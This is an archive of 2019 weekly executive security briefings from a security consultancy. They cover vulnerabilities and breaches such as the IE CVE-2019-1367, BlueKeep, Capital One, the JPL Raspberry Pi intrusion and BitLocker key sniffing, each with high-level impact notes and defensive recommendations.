REGISTER FOR OUR LIVE WEBINAR “GHOST IN THE NETWORKS ” NOV 21 12 PM PST / 3 PM EST

InGuardians Weekly Executive Briefing

InGuardians Security Briefing

Sign up for our once per week free information security briefing. Concisely written executive summary of the one topic our team has identified as top priority.
* indicates required
Email Format

Archive

10/1/19 Emergency out-of-cycle patch from Microsoft - must be manually installed

Subject
Emergency out-of-cycle patch from Microsoft – must be manually installed

Issue
On Monday, September 23, Microsoft released a rare out-of-band security update to address two vulnerabilities found in Windows Defender and Internet Explorer (CVE-2019-1367 and CVE-2019-1255).  The US Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency subsequently issued an alert advising all sectors to patch ASAP.

CVE-2019-1367 is a critical flaw in Internet Explorer, versions 9 to 11. The flaw was discovered by Clément Lecigne of the Google Threat Analysis Group. Attackers achieve remote code execution by luring a user to browse a malicious website with a vulnerable browser. The attacker gains the ability to execute code in the context of the user that accessed the malicious web page. Depending on the user’s privilege level, this could allow an attacker to install and run programs, view and modify data, or create new user accounts with full rights and access. Some of these actions may require the user to have privileged access.

CVE-2019-1255 is a less severe flaw which allows for denial of service attacks, triggered by Windows Defender improperly handling files.

Impact
Clément Lecigne discovered CVE-2019-1367 was being actively exploited in the wild.  According to Microsoft’s vulnerability notice, the vulnerability is a memory corruption issue, which permits the attacker to execute code in the context of the current user.

CVE-2019-1255 is a file-handling flaw that an attacker could use to prevent users from executing operating system programs.  This would allow the attacker to render the system dysfunctional.  This flaw is considered less severe because it requires the attacker to already have code running on the target machine.  This flaw has not yet been reported to be exploited in the wild.

Recommendations
InGuardians recommends that Microsoft Windows users download and manually install the patch for CVE-2019-1367. As of the time of this writing, the patch is not yet available through Windows Update, Microsoft Update, or Windows Server Update Services (WSUS) – it must be downloaded and installed manually.. Because of the severity of the flaw and its active exploitation in the wild, both Microsoft and DHS urge this be done ASAP. CVE-2019-1255 will auto-update via the Malware Protection Engine, but users should verify the update is completed on their systems.

Additional Resources
CVE-2019-1367 | Scripting Engine Memory Corruption Vulnerability (Microsoft)
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1367

“Nine words to ruin your Monday: Emergency Internet Explorer patch amid in-the-wild attacks”  (The Register)
https://www.theregister.co.uk/2019/09/23/microsoft_internet_explorer_cve_2019_1367/

“DHS Urges Patch for Two Microsoft Out-of-Band Vulnerabilities” (Health IT Security)
https://healthitsecurity.com/news/dhs-urges-patch-for-two-microsoft-out-of-band-vulnerabilities

“Microsoft Releases Out-of-Band Security Updates”  (CISA – National Cyber Awareness System)
https://www.us-cert.gov/ncas/current-activity/2019/09/23/microsoft-releases-out-band-security-updates

9/23/19 New SD Express memory card brings NVMe speed, but PCIe risk

Issue
In 2018, the SD Association ratified v7.0 of its standard, bringing the potential speed of NVMe drives to a new SD card standard by allowing the cards to directly access the computer’s PCI-e bus. Called “bus mastering,” this allows the SD card to read and write the computer’s RAM, without the permission or intervention of the computer’s CPU. Recently, the first host controller was developed for these cards.

Impact
The standard defines the “SD Express card,” which utilizes the same NVMe technology present in higher-end solid state drives. The highest speed peripheral protocols derive raw speed from communicating directly with a computer or phone’s RAM over a PCIe bus: Firewire cables, Thunderbolt cables and, of course, PCIe cards, including NVMe solid state drives. By eliminating the CPU from the interaction between peripheral and RAM, there’s a decrease in latency and CPU utilization. On the other hand, the CPU can lose the ability to confine the peripheral’s type of interaction with memory.

Lest one believe this theoretical to exploit, note that researcher Ulf Fritz has weaponized this functionality with the PCILeech tools. Using either a commodity USB-to-PCIe card or field-programmable gate array (FPGA), a bad actor who accesses a computer’s PCIe bus can then read and modify the computer’s RAM. Using software like PCILeech, the bad actor can compromise the operating system, modify RAM, or steal data.

No SD Express cards have yet been brought to market, but they’re expected in the next year. These cards could be modified or created to attack a computer, using the same techniques as the current PCILeech-supported devices. There’s increased danger here, as an overwhelming percentage of computers ship with a microSD or SD card slot. These slots are externally and casually accessible to a bad actor.

Recommendations
InGuardians recommends that organizations ensure that policy is already in place to handle the exposure that PCILeech poses: a laptop with a locked screen may not be safe against compromise. If an attacker can reach a PCIe-connected port (SD Express, Thunderbolt, Firewire, or PCIe bus interface), they can read and write to RAM, changing the state of the machine.

InGuardians further recommends that organizations remain vigilant, watch for the release of SD Express cards and laptops/phones that support this standard. Organizations should develop policies concerning the use of, and protection against, these devices. Particularly-sensitive organizations, such as government agencies, should consider physically rendering the ports unusable.

Conducting a security review of all upcoming IT projects is a great way to evaluate the risks that deploying new technology poses to your organization.

Additional Resources

SD and microSD Express Cards 7.1 (SD Alliance Whitepaper)
https://www.sdcard.org/downloads/pls/latest_whitepapers/SD_and_microSD_Express_Cards_7_1_WhitePaper20190225.pdf

“Phison Develops PS5017 Controller for SD Express MicroSD Express Cards” (Anandtech)

https://www.anandtech.com/show/14551/phison-develops-ps5017-controller-for-sd-express-microsd-express-cards

“Direct Memory Attack the Kernel“: (Def Con 24 Talk by Ulf Frisk)
https://www.youtube.com/watch?v=fXthwl6ShOg

“PCIe Injector Gateway – based on Xilinx Artix7 FPGA and FTDI USB FT601 chip” (Firmware Security Blog)

https://firmwaresecurity.com/2017/12/31/pcie_injector-pcie-injector-gateway-based-on-xilinx-artix7-fpga-and-ftdi-usb-ft601-chip/

9/17/19 Local city government defeats ransomware attack.

Issue
Years after both Mirai and WannaCry were successful in exploiting Windows SMB vulnerabilities, systems remain unpatched. The original and derivative malware versions are still using the same flaws and default credentials to gain access, particularly for ransomware attacks. The City of New Bedford, Massachusetts’ IT staff identified the presence of the file-scrambling RYUK nasty. Criminals demanded $5.3 million. The city counter-offered $400,000, based on a budget related to the city’s cyber-insurance policy limits. When the cyber-criminals declined, the city continued negotiating, buying the IT staff the time needed to bolster defenses and restore files from backups. The city paid no ransom and had no interruption in service.

Impact
Derivatives of already successful malware are increasing their effectiveness and uses. They have improved capabilities and altered signatures in order to evade detection. The fact that attackers are still successfully using several-year old patchable-vulnerabilities reveals the current state of insecurity at many organizations. The failure of companies to patch suggests other gaps in IT security practices and policies. 

That is a key distinction: practice vs. policy. Lack of policy will almost ensure that a security function is not done. Having a policy alone does not ensure that it is followed. Specific practices must be devised, be sensible, and be able to be followed without extraordinary or disruptive efforts. Difficult security is too often failed security – it’s not done, done badly, or filled with workarounds and compromise.

The City of New Bedford, Massachusetts found a way to deal with ransomware without paying: shoring up defenses, restoring from backups, and rebuilding systems. “We haven’t seen any interruption in municipal services at all,” said Mayor Mitchell.  This solution, undoubtedly, cost the company far less than even their negotiating position.

Recommendations
The first thing to learn from New Bedford’s case is that the best way to defeat an attacker is not to let them get access to the system.  A well-governed information security program that includes vulnerability management and remediation needs to be implemented and tested.  Your organization’s IT patch management and policies must be effective at identifying vulnerable systems and deploying patches across an organization in a timely way. Applying patches two to three years after their release is not timely, nor cost-effective.

The second critical lesson is that when an organization is compromised, clean backups of systems, software and data are essential to recovery and business continuity. Yet these backups are only a single component to a full defense-in-depth strategy; all is still lost if the root cause is not discovered, eradicated, and monitored before returning the restored systems back to service.
None of this is new, but evidence shows patching and recovery may not be done as well as one might think. A surge in IoT and SMB attacks have targeted unpatched vulnerabilities in 2019 – this highlights the need for diligence.
Review both policy and practice. Do internal checks to verify the current patch state, and follow a new patch through your process. Review and exercise data recovery plans. This does not need to be large scale; pick a system and do a test restore to a clean system.

Practice, because actual data recovery from an EternalBlue ransomware hack should not be your first rodeo.

Additional Resources
“Massachusetts city tells ransomware scumbags to RYUK off, our IT staff will handle this easily” (The Register)
https://www.theregister.co.uk/2019/09/06/ryuk_bedford_recovery/

“Attack Landscape H1 2019: IoT, SMB traffic abound” (F-Secure Blog)
https://blog.f-secure.com/attack-landscape-h1-2019-iot-smb-traffic-abound/

“Wielding EternalBlue, Hackers Hit Major US Business” (Information Security Media Group)
https://www.bankinfosecurity.com/wielding-eternalblue-hackers-hit-major-us-business-a-11517

9/9/19 Public Metasploit module for BlueKeep released

Issue
There is now a public open source exploit for the BlueKeep vulnerability checked into the Metasploit Framework.  Security researchers have long been concerned about the public release and availability of a stable exploit for the BlueKeep exploit tool that would work against all versions of Microsoft Windows.  In initial testing, this release isn’t quite as stable and powerful as the exploit tool originally released by the “Shadowbrokers” group, but it is the first step in that direction.  Now that the exploit community has code it can work with, there will be rapid improvements and evolutions of the exploit and defenses.

What does this mean for the blue teams at companies around the world?  If your vulnerable systems weren’t being compromised by BlueKeep already, ensure that you are at the current patch level and go hunting for malicious activity.  We will also see better signatures for our perimeter defenses, so be on the lookout for new signatures/rules being added and whether they show the exploit being used against your systems.

Impact
The impact of this is twofold: On one side the release of the exploit module for Metasploit has created an avenue for attackers to more easily attack Windows-based systems.  On the other, Metasploit is also used by blue teams at large organizations to test their defenses and now they have another arrow in the quiver. InGuardians sees the overall impact of the release of the BlueKeep Metasploit module as a positive, in that while it might mean more systems are compromised in the near time, it will also be used to test and validate that systems are patched at corporations and large networks.

Recommendations
Patch, run, repeat.  In Microsoft’s Knowledge Base article on the BlueKeep vulnerability and patch, they rate the vulnerability against older than current patch level as “1 – Exploitation More Likely”.  In addition to staying current on patch levels, stay up to date on the rules/signatures for your perimeter monitoring and defense systems.  Apply the latest signatures and look for alerts matching BlueKeep activity, it is important to note that exploit activity for BlueKeep may appear identical to vulnerability scanning for the same.  Investigate whether the source of the activity is a valid vulnerability scanner and if not treat it as hostile and/or compromised.

Going beyond the simple patch fix, network segmentation down to layer 2 with private VLANs and a network vulnerability management program are both good places to start.

Additional Resources
Microsoft advisory and patch for BlueKeep (note: their site needs to be updated now that there is publicly available exploit code).
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708

Ars Technica article on the release of the Metasploit module:
https://arstechnica.com/information-technology/2019/09/exploit-for-wormable-bluekeep-windows-bug-released-into-the-wild/

ZDNET article on the Australian Signals Directorate warning about the public release
https://www.zdnet.com/article/asd-releases-warning-of-bluekeep-vulnerability/

8/5/19 106 Million People Impacted by Capital One Data Breach

Issue
It is alleged that in March of this year, Paige A. Thompson gained access to a number of records belonging to Capital One. The attacker was able to gain access to several of Capital One’s Amazon S3 buckets by abusing a token used by a misconfigured Web Application Firewall (WAF). This provided enough access to enumerate and view information stored in these S3 buckets. After downloading the contents of the S3 buckets (containing several gigabytes of data) the attacker uploaded the stolen information to her personal GitHub page, which was created in her name.

Impact
While 106 million people were affected by this breach, only a small percentage of the victims had bank accounts, Social Security Numbers, or Social Insurance Numbers compromised. The large portion of the compromised data contained credit card application data. This breach highlights the need to review access logs and, in particular, account permissions for data hosted in the cloud.

Recommendations
Performing regular reviews of Cloud, in this case, AWS, account permissions will reveal gaps in actual account access versus business need. InGuardians also strongly recommends that access logs be reviewed on a continual basis. If Capital One trended regular account access, the spike in usage from this account could likely have been flagged rather quickly. One final control that could have made a difference in both this and similar incidents, would be whitelisting access to the S3 bucket, to restrict access to only Capital One’s approved IP address range.

In addition to continued log analysis, behavioral models of account activity, usage, and commands executed over time could have revealed potential compromise. Capital One, as part of their investigation, noted that the initial account access to the WAF should have never had the authority to execute the commands used to gain access to the S3 buckets.  This activity, in particular, is an illustrative example of a significant deviation from normal operation compared to a known baseline,  one that should trigger alerts for further investigation.

Additional Resources
Capital One Data Theft impacts 106 million people
https://krebsonsecurity.com/2019/07/capital-one-data-theft-impacts-106m-people/

Information on the Capital One Cyber Incident
https://www.capitalone.com/facts2019/

USA vs Paige Thompson
https://www.justice.gov/usao-wdwa/press-release/file/1188626/download

7/30/19 University Systems Breached Through Known ERP Vulnerability

Issue
The US Department of Education states that systems at 62 colleges and universities have been compromised through an improper authentication vulnerability in Ellucian Enterprise Resource Planning (ERP) software. In a technology Security Alert, the Office of Federal Student Aid writes that a vulnerability affecting certain versions of Ellucian Banner Web Tailor and Banner Enterprise Identity Services has been exploited at the schools to create thousands of fake student accounts, some of which have been used to conduct criminal activity. The vulnerability was first detected late last year, and  Ellucian developed and released a patch several months ago.

Impact
The flaw was detected in December 2018, and the patch was released in May 2019, which is often a busy time for colleges. Coupling this timing with a CVSSv3 rating of 8.1 (high, but not critical) likely made it harder for campus information security departments to insist the patch be applied rapidly.  It is likely that this vulnerability has been used to compromise many universities & colleges around the world.  Given that fake accounts from this exploit have already been detected committing crimes, the overall impact will continue to grow in the coming weak.

Recommendations
InGuardians recommends that institutions of higher education apply patches to any Ellucian ERP systems. Additionally, particularly given Ellucian’s claims that admission portals are being exploited by botnets, InGuardians recommends that institutions add reCAPTCHA capabilities to those portals, which could greatly hinder that activity, particularly with this vulnerability.

In addition to patching and installing reCAPTCHA functionality to your portals, InGuardians recommends verifying valid accounts and checking application logs for signs of compromise.  If you use Ellucian software, now is good time to be actively hunting your network for signs of compromise, regardless if you had patched before this most recent announcement.

Additional Resources
“Ellucian systems compromised at 62 universities, Education Dept. says” (EdScoop)
https://edscoop.com/ellucian-banner-cyberattacks-62-universities/

“Hackers breach 62 US colleges by exploiting ERP vulnerability” (ZDNet)
https://www.zdnet.com/article/hackers-target-62-us-colleges-by-exploiting-erp-vulnerability/

“Over 60 US Colleges Compromised by ERP Exploit” (InfoSecurity Magazine)
https://www.infosecurity-magazine.com/news/over-60-us-colleges-compromised-by/ 

Exploitation of Ellucian Banner System Vulnerability” (US Department of Education and Federal Student Aid)
https://ifap.ed.gov/eannouncements/071719ITSecurAlertExploitationEllucianBannerSysVulnerability.html

“Banner Web Tailor and Banner Enterprise Identity Services Vulnerability Disclosure” (Joshua Milliken)
https://github.com/JoshuaMulliken/CVE-2019-8978

CVE-2019-8978 Detail (NIST)
https://nvd.nist.gov/vuln/detail/CVE-2019-8978

7/1/19 Rogue Raspberry PI used to steal NASA’s secrets

Issue
NASA’s Office of Inspector General has revealed a nearly year-long compromise by an advanced persistent threat (APT) group of NASA’s Jet Propulsion Lab (JPL). The APT bad actor accomplished this by placing a single-board Raspberry Pi computer onto JPL’s network. Because JPL had little to no segmentation on their network, a single network endpoint was able to steal and exfiltrate valuable and regulated information.

The larger issue at hand is that an insider threat deployed a rogue device on the network and used it to steal sensitive information.

Impact
The bad actor gained access to quite a bit of information, including plans for Mars missions being managed by JPL. Some of the information is illegal to export from the United States, under the International Traffic in Arms (ITAR) regulations.

The larger impact is potentially severe, as most organizations are not prepared to identify and isolate a rogue device on their internal networks.

Recommendations
Information security practitioners both inside and outside companies strongly push for network segmentation, which is critical to containing or even avoiding attacks like this one. In the process of building networks, however, companies generally deploy full connectivity for every single computer to every other, whether that connectivity will be required by the business. For example, in many companies, a publicly-accessible machine in the lobby can often reach the machines holding the most valuable intellectual property or controlling the most critical business information.

Private VLANs are one of many options available to aid in network segmentation.  The theory behind this is to create private VLANs on switches for each workstation, and promiscuous private VLANs for the servers.  This allows workstations to communicate with servers, but not with each other.

InGuardians also recommends regular sweeps of networks and office spaces.  During these sweeps, physical and network spaces are actively scanned attempting to identify all network connected devices.  In addition to sweeps, InGuardians recommends using network monitoring tools to identify new machines connected to the network.  Zeek (formerly bro), arpwatch and many other correlation engines will keep a running log of all new machines that join the network.

Additional Resources
NASA hacked because of unauthorized Raspberry Pi Connected to its Network (zdnet.com)
https://www.zdnet.com/article/nasa-hacked-because-of-unauthorized-raspberry-pi-connected-to-its-network/

NASA OIG final report on Cyber Security
https://oig.nasa.gov/docs/IG-19-022.pdf

Configuring private VLANS on Cisco Switches
https://www.cisco.com/c/en/us/td/docs/switches/datacenter/nexus5000/sw/configuration/guide/cli/CLIConfigurationGuide/PrivateVLANs.html

Zeek, formerly bro-ids, network monitoring utility:
https://www.zeek.org/

5/14/19 Microsoft patches serious Remote Desktop Services Vulnerability

Issue
Microsoft released a security update that patches a remote code execution vulnerability in Remote Desktop Services (formerly Terminal Services) on a number of platforms.  The list of affected in-support Windows versions includes: Windows 7, Windows Server 2008 R2, and Windows Server 2008.  The vulnerability is pre-authentication, which led Microsoft to announce that this was a worm-able flaw.

Impact
A remote code execution exploit against a service that is often exposed, coupled with the fact that it is pre-authentication, makes the potential severity and impact of this flaw to be high.

According to Microsoft’s advisory, Windows 8 and Windows 10 users are not affected by this vulnerability.  Due to the severity of the vulnerability Microsoft has issued patches for both Windows XP and Server 2003 which are no longer actively supported.

Recommendations
The top thing you can do is apply the latest updates for your Microsoft systems. Enabling Network Level Authentication (NLA) can be used to reduce the risk of an unauthenticated attacker, but still leaves the machine vulnerable.

The patches that fix the Remote Desktop Services vulnerability (CVE-2019-07-08) can be found here:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708

Microsoft customers that are in-support and have automatic updates turned on should already be patched.  Patch verification through your vulnerability management program is recommended.

Additional Resources
Microsoft Advisory for the Remote Desktop Services vulnerability (CVE-2019-07-08):
https://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/

Microsoft Security Updates for Remote Desktop Services vulnerability (CVE-2019-07-08):
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708

5/1/19 Supply chain attack targets video game developers

Issue
Researchers from Kaspersky and ESET have identified evidence that the same attackers that compromised ASUS with a supply chain attack have also compromised at least three video game companies.  Supply chain attacks target the manufacturers of hardware and software upstream of the final victim company.

In order to compromise ASUS the attackers managed to subvert the ASUS software update service.  Undiscovered for over five months, this allowed attackers to compromise thousands of ASUS customer systems.

In the case of the compromised game companies attackers targeted Microsoft Visual Studio, uploading malware into the developers build environment, ultimately granting the attackers the ability to add their own malicious code to production software.  This in turn gave the attackers the ability to backdoor the games installed on thousands of unsuspecting customers.

Impact
The impact of the compromised games should be low to medium to our clients.  This is mainly because most businesses do not allow games to be loaded on to their desktops and laptops.  Two of the three game companies have been identified as Electronics Extreme and Zepetto.  Given that these two companies are based in Asia, it is not surprising that the majority of infected systems are located there.  Kaspersky and ESET have said they have identified almost 100k infected systems.

The impact of supply chain attacks, however, is immense because this compromised Microsoft Visual Studio.  This should be a reminder for everyone in infosec to re-read “Reflections on Trusting Trust” by Ken Thompson.  Ken described a devastating attack chain that was originally discovered by Paul Karger and Roger Schell in 1974. The attack described the compromise of a binary compiler, so that every program it compiled was malicious.

To wrap up, the impact of successful supply chain attacks is severe.  If the supply chain attack compromises a compiler or an update service, all downstream users will be compromised.

Recommendations
InGuardians recommends conducting a supply chain security analysis.  This will provide your organization with a threat landscape as it concerns the elements of your supply chain.  The difficult aspect of this is that in most cases the downstream companies usually have little visibility into the source code or hardware they purchase.  An important part of the QA & build process should be to ensure that no “additional” functionality or code goes into your end product.

Additionally, this becomes an opportune time to audit and revise B2B and other contract language to include the need for security requirements from suppliers.  This language could include the requirement to conduct and share the results of recent security assessments and code audits under non-disclosure agreements.

Additional Resources
Supply Chain Hackers Snuck Malware Into Videogames –
https://www.wired.com/story/supply-chain-hackers-videogames-asus-ccleaner/

Hackers Hijacked ASUS Software Updates to Install Backdoors on Thousands of Computers
https://motherboard.vice.com/en_us/article/pan9wn/hackers-hijacked-asus-software-updates-to-install-backdoors-on-thousands-of-computers

Reflections on Trusting Trust by Ken Thompson
https://dl.acm.org/citation.cfm?id=358210

Countering “Trusting trust” by Bruce Schneier – https://www.schneier.com/blog/archives/2006/01/countering_trus.html

InGuardians Events & Resources

Upcoming Webinars
“RED TEAM PRIMER FOR EXECUTIVES” with InGuardians Offensive Security Team
May 30, 12 PM PDT / 3 PM EDT

Join Mike Poor as he moderates this roundtable discussion with members of the InGuardians Offensive Services Team.  This webinar will discuss red team penetration test definitions, what clients should be considering when preparing for one, and what to expect to learn from the results.  If you have questions that you would like answered on the webinar, contact us via email (webinars@inguardians.com) or ask us on Twitter (@inguardians).

Register here: https://attendee.gotowebinar.com/register/5144772534233303564

For all upcoming webinars, please visit: https://www.inguardians.com/webinars/

Upcoming Classes
ICS410: ICS/SCADA SECURITY ESSENTIALS

Instructor: Justin Searle, Director of ICS Security, InGuardians, SANS Certified Instructor

SANS Security West | San Diego | May 9 – May 13 2019

SEC617: WIRELESS PENETRATION TESTING AND ETHICAL HACKING
Instructor: Larry Pesce, Director of Research, InGuardians, SANS Certified InstructorAmsterdam, Netherlands | May 20 – May 25, 2019

4/2/19 Critical Flaw in Rockwell Automation Hardware Allows for DoS of Popular ICS Component

Issue
Researchers have discovered a vulnerability in version 5.001 of the software for Rockwell’s PowerFlex 525 drive component.  This drive component is flexible in the number of roles it can perform and sees use in a number of industrial application from conveyors to fan and pump controls.  The vulnerability,  CVE-2018-19282, was first disclosed to Rockwell by researchers at Applied Risk, back in June, 2018. It allows for an attacker to send a crafted flow of packets that crashes the Common Industrial Protocol (CIP) network stack on the system.  Interestingly, when executed, this attack vector locks out all other connections while allowing the attacker to maintain a connection through which traffic can continue to flow.  The only method to clear the state is a hard-power reset of the drive.

An attack of this nature provides a real threat to both the Availability and the Integrity segments of the CIA triad, which lays at the heart of most security designs.  For ICS systems, which typically place emphasis on the availability portion of the triad as opposed to conventional IT, which tends to favor confidentiality as the primary segment of the triad, this type of attack is particularly dangerous.

Impact
As with most serious ICS-focused vulnerabilities, this one has the potential to transit between the digital landscape and impact the kinetic landscape by allowing the attacker the ability to alter the functioning of the drives and potentially causing physical harm to the systems they ostensibly control.

The ability to change the functioning state of control for devices designed to govern cooling or air flow to whatever state an attacker desires, coupled with the inability for legitimate operators to connect to the device increase the risk of the vulnerability.

Fortunately, Rockwell has released a patch for affected software.  However, it should also be noted that other manufacturers also released a number of security advisories over the last week for a range of products.  This is an indication of the increased awareness on their part of the growing threat landscape affecting such systems.

For Non-ICS systems, this should serve as another reminder that in today’s growing Internet of Things, there are likely devices attached to your networks that lay somewhere in-between conventional IT resources and ICS resources.  Knowing that those devices are present and ensuring that those devices are patched are two challenging pieces of a growing puzzle that is managing modern computing environments.

Recommendations
As the number of attractive ICS targets increases, and as attempts to develop the capability to impact the physical world from compromised digital systems also increases, it becomes increasingly important for organizations to maintain strict disciple as it regards patching systems.  This is especially relevant for ICS  systems which have not always been rigorously patched.

Organizations which use the affected Rockwell systems should patch them immediately, if they have not already done so.

In addition, controlling the flow of TCP and UDP traffic on Port 2222 and Port 44818 (which are the key ports used by this Rockwell system), by restricting the sources that can access the devices can help to mitigate the attack vector.

Additional Resources
Advisory
https://applied-risk.com/application/files/4215/5385/2294/Advisory_AR2019004_Rockwell_Powerflex_525_Denial_of_Service.pdf

Rockwell Product Page
https://ab.rockwellautomation.com/Drives/PowerFlex-525

CVE:
https://ics-cert.us-cert.gov/advisories/ICSA-19-087-01

InGuardians Events & Resources
Upcoming Webinars

“SCANNERS, TUNNELS, AND SIMS, OH MY!” with Justin Searle, Director of ICS Security .
April 18, 12 PM PDT / 3 PM EDT

Learn more about Control Things Tools project & and the Python library that provides the command-line and graphical interfaces for these tools.
Register here: https://register.gotowebinar.com/register/8814422277734413068

“RED TEAM PRIMER FOR EXECUTIVES” with InGuardians Offensive Security Team
May 30, 12 PM PDT / 3 PM EDT

Join us for a primer on Red Team Penetration Testing.  InGuardians Offensive Services Team will discuss what is a red team pentest, what clients should be considering when preparing one, and what to expect to learn from the results.

Register here: https://attendee.gotowebinar.com/register/5144772534233303564

For all upcoming webinars, please visit: https://www.inguardians.com/webinars/

Upcoming Classes

ICS410: ICS/SCADA SECURITY ESSENTIALS
Instructor: Justin Searle, Director of ICS Security, InGuardians, SANS Certified Instructor

SANS Orlando | Apr 1 – Apr 5 2019

SANS Security West | San Diego | May 9 – May 13 2019
SEC617: WIRELESS PENETRATION TESTING AND ETHICAL HACKING
Instructor: Larry Pesce, Director of Research, InGuardians, SANS Certified Instructor

Amsterdam, Netherlands | May 20 – May 25, 2019

SEC560: NETWORK PENETRATION TESTING AND ETHICAL HACKING (MENTOR SESSION)
Instructor: David Mayer, Senior Security Consultant

Boca Raton, FL | Thu May 9 – Fri May 24, 2019

For all upcoming training and events, please visit: https://www.inguardians.com/training/

3/26/19 Bitlocker Keys Recoverable, Allowing Bad Actors to Unlock Encrypted Disks

Issue
Earlier in March, researchers from PulseSecurity released their analysis and research in recovering Bitlocker Full Disk Encryption (FDE) Master Keys from an associated v1.2 or v2.0 Trusted Platform Module (TPM) by sniffing the key exchange on the bus with inexpensive hardware.  The recovered Master Key was then used to decrypt the drive, recovering all of the data.

Impact

Given tools, time and knowledge of this technique, an attacker with physical access can decrypt a Bitlocker full disk-encrypted computer.

Many organizations rely on Microsoft Bitlocker as a solution for built-in, low cost, easily managed FDE, leveraging the previous investments in Microsoft products.  While InGuardians recommends FDE as a matter of course, these new attacks against default installations of Bitlocker have raised questions about its overall effectiveness.

While this attack is particularly obtuse in its implementation, requiring some special skills, hardware and analytic techniques, all are well within capability for even a moderately determined attacker. This is compounded by the readily available inexpensive hardware and open source tools.  Some points to note on this attack; the device must be in possession of the attacker in order to obtain the communication on the bus between the TPM and the drive; also, unlike the “evil maid” attacks, this attack does require significant time and setup to perform.

Ultimately, should an organization lose a device encrypted with Bitlocker with the default configuration they should no longer consider the data contained therein secure, and should consider the application of the appropriate breach notification requirements for their jurisdiction.

This specific attack is aimed at Bitlocker, but demonstrates that key exchange and key storage are critical elements of any security implementation. Every FDE system needs to be implemented properly. Like any technology involving cryptography, that implementation can be difficult.

Recommendations
In its default state, Bitlocker can be compromised through this attack. However, with the adoption of additional controls within the boot process and Bitlocker configuration, this attack can be effectively mitigated. These additional configuration can take the form of pairing the TPM with a pre-boot pin to be entered by the user at time of boot, or the TPM in combination with a properly configured Smart Card.  In these two cases, two factor authentication (2FA) has been added to the boot process, adding additional unknown/unrecoverable data to the Bitlocker encryption/decryption process. In mitigating this specific attack, it does require user intervention at time of boot, potentially perceived as a hindrance to forkflow.

Additional Resources

Pulse Security – EXTRACTING BITLOCKER KEYS FROM A TPM https://pulsesecurity.co.nz/articles/TPM-sniffing

Microsoft – Bitlocker Coutermeasures
https://docs.microsoft.com/en-us/windows/security/information-protection/bitlocker/bitlocker-countermeasures

InGuardians Events & Resources

Upcoming Webinars:

“HACKING AND HARDENING KUBERNETES” with Jay Beale, CTO at InGuardians

Thursday, March 28 at 12 PM EDT /3 PM EDT
Understand how to attack and defend Kubernetes and other container orchestration platforms.
Register here: https://attendee.gotowebinar.com/register/3676332972988128524

——

“SCANNERS, TUNNELS, AND SIMS, OH MY!” with Justin Searle, Director of ICS Security
.

April 18 12 PM PDT / 3 PM EDT
Learn more about Control Things Tools project & and the Python library that provides the command-line and graphical interfaces for these tools.

Register here: https://register.gotowebinar.com/register/8814422277734413068

For all upcoming webinars, please visit: https://www.inguardians.com/webinars/

——

Upcoming Classes

ICS410: ICS/SCADA SECURITY ESSENTIALS
Instructor: Justin Searle, Director of ICS Security, InGuardians, SANS Certified Instructor

SANS Orlando | Apr 1 – Apr 5 2019
——

SEC617: WIRELESS PENETRATION TESTING AND ETHICAL HACKING
Instructor: Larry Pesce, Director of Research, InGuardians, SANS Certified Instructor

SANS Security West | San Diego | May 9 – May 13 2019
——
SEC617: WIRELESS PENETRATION TESTING AND ETHICAL HACKING
Instructor: Larry Pesce, Director of Research, InGuardians, SANS Certified Instructor

Amsterdam, Netherlands | May 20 – May 25, 2019
——
SEC560: NETWORK PENETRATION TESTING AND ETHICAL HACKING (MENTOR SESSION)

Instructor: David Mayer, Senior Security Consultant

Boca Raton, FL | Thu May 9 – Fri May 24, 2019

For all upcoming training and events, please visit: https://www.inguardians.com/training/

3/13/19 Citrix Breached: Over Six Terabytes of Data Stolen, Impact to Clients Unknown

Issue
On March 8th, Citrix announced that it had been hacked and that over six (6) terabytes of sensitive data had been stolen. This attack is currently being attributed to the Iranian-backed Iridium group. The files were exfiltrated from the network after the malicious actors bypassed multi-factor authentication systems and connected to Citrix VPNs. The bad actors stole e-mail correspondence, files left on network shares, and data pertaining to project management and procurement. The FBI believes that the attackers gained access to Citrix networks by brute forcing a weak password on the external network and currently has no idea how long the attackers were on the network before they were detected.

Impact
While the breach’s impact is currently being evaluated,  Citrix clients should be monitored closely to ensure that client accounts and credentials were not stolen along with internal documents.

Recommendations
Given the sheer volume of data stolen in the breach, InGuardians recommends changing all passwords for accounts related to Citrix. InGuardians also recommends that organizations take a strong look at their password policies and ensure that strong passwords are being utilized in your organization to help prevent password spraying of common passwords allowing attackers to gain access to your network. Multi-factor authentication is also critical, but does not make strong password policies irrelevant.
If  you suspect that your organization has been affected by the breach, begin incident response triage and initiate a threat hunting operation.

Additional Resources
Iranian-backed hackers ransacked Citrix, swiped 6TB+ of emails, docs, secrets, claims cyber-biz (The Register)
https://www.theregister.co.uk/2019/03/08/citrix_hacked_fbi/

“Citrix investigating unauthorized access to the internal network” (Citrix Blog: Stan Black)
https://www.citrix.com/blogs/2019/03/08/citrix-investigating-unauthorized-access-to-internal-network/

“Iranian-backed hackers stole data from major U.S. government contractor” (NBC News)
https://www.nbcnews.com/politics/national-security/iranian-backed-hackers-stole-data-major-u-s-government-contractor-n980986

InGuardians Events & Resources
LIVE WEBINAR Thursday, March 28 at 12 PM EDT /3 PM EDT
“Hacking and Hardening Kubernetes” with Jay Beale, CTO at InGuardians
Register here:  https://register.gotowebinar.com/register/3676332972988128524

Justin Searle, InGuardians Director of ICS Security will be at SANS ICS Summit in Orlando, Florida.

“Scanners, Tunnels, and Sims, Oh My!”
Learn more about Control Things Tools project & and the Python library that provides the command-line and graphical interfaces for these tools with Justin Searle, our Director of ICS Security at SANS ICS Summit | Mar 18-25 | Orlando, FL.

LIVE WEBINAR on April 18 12 PM PDT / 3 PM EDT
“Scanners, Tunnels, and Sims, Oh My!” with Justin Searle, Dir of ICS Security
Learn more about Control Things Tools project & and the Python library that provides the command-line and graphical interfaces for these tools.
Register here: https://register.gotowebinar.com/register/8814422277734413068

For all upcoming training and events, please visit: https://www.inguardians.com/training/

For all upcoming webinars, please visit: https://www.inguardians.com/webinars/

3/7/19 Dow Jones’ watchlist of 2.4 million high-risk individuals has leaked

Issue
